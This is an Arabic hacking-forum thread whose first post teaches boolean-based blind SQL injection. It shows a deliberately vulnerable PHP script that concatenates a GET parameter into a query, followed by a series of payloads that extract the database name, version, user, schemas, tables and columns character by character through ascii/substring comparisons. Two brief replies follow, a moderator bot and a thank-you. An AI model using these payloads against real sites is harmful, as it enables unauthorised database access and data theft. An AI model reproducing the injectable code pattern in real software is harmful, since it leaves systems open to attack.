1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ŦђĘ βě$Ţ | المشاهدات : 1,627 | الردود : 2
الوسوم:
حالة الموضوع:
مغلق
  1. ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    [​IMG]




    boolean-based blind sql injection


    نوع من انواع ثغرات سكيول


    مثال:


    كود PHP:
    <?php
    mysql_connect
    ('localhost','user','pass');
    mysql_select_db('sql_test');

    $reponse=mysql_query("select * from dz where `nom` like '%".$_GET['sql']."%' ");
    if(!
    mysql_num_rows($reponse)==0){
    echo 
    "dz";
    };

    ?>


    السكربت يتصل بقاعدة البيانات و تجلب النتيجة اذا وجدت يطبع


    dz


    كما نلاحظ


    http://site.com/index.php?sql=1


    النتيجة


    كود:
    dz
    *=== تحديد كود ===*

    لو اضفنا and 1=1

    ******************************************
    http://site.com/index.php?sql=1 and 1=1

    (sql=1) ==>صحيح
    (1=1) ==>صحيح
    صحيح و صحيح يساوي صحيح
    اذن تطبع كلمة dz
    ******************************************
    http://site.com/index.php?sql=1 and 1=0

    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح و خطأيساوي خطأ
    اذن لا تطبع كلمة dz

    ********************************************


    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح او خطأيساوي خطأ
    اذن تطبع كلمة dz


    ******************************************
    في المواقع
    تكون بملاحظة اختلاف بعد وضع سلاش / او '
    او اضافة استعلام خاطئ

    ننتقل الى المهم اوامر استخراج البيانات

    كود PHP:
    and ascii(substring (sql,1,1))=0
    substring
    هذا الاستعلام لتقسيم رد قاعدة البيانات
    substring (sql,x,y)
    x:الرتبة
    y:درجة التقسيم اذا كان 1 معناها وحدة وحدة
    ثم نشفر هذا الجزء بال ascii
    ثم المقاربة باستخدام
    = > <
    بستعمل الحصر لنجد الحرف بسرعة

    اذا تم طباعة dz كم في المثال معناها الاستعلام صحيح


    ******************************************
    استخراج اسم القاعدة

    كود PHP:
    and ascii(substring (database(),1,1))=0
    .
    .
    .
    .
    and substring (database(),1,1)=97 ==> صحيح


    اول حرف من القاعدة هو a
    ascii(a)=97
    اذا 97=97 ===> صحيح
    ننتقل الى الحرف الثاني
    كود PHP:
    and substring (database(),2,1)=0
    و هكذااااااااااااا

    ******************************************
    اصدار القاعدة

    كود PHP:
    and ascii(substring (version(),1,1))=0
    ******************************************
    اسم مستخدم القاعدة

    كود PHP:
    and ascii(substring (user(),1,1))=0
    ******************************************

    استخراج قواعد البيانات

    كود PHP:
    and ascii(substring ((select schema_name from information_schema.schemata),1,1))=0

    ******************************************
    استخراج اسماء الجداول
    كود PHP:
    and ascii(substring ((select table_name from information_schema.tables),1,1))=0
    ******************************************
    استخراج الاعمدة
    كود PHP:
    and ascii(substring ((select column_name from information_schema.columns),1,1))=0
    ******************************************

    تكمن استخدام جميع اوامر الشل سكيول
     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. ريلاكس ياقلبي Active DeveloPer

    الأنتساب:
    ‏12 نوفمبر 2012
    المشاركات:
    94
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    رد: boolean-based blind sql injection

    يعطيك آلعـأفية يآ وحش
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة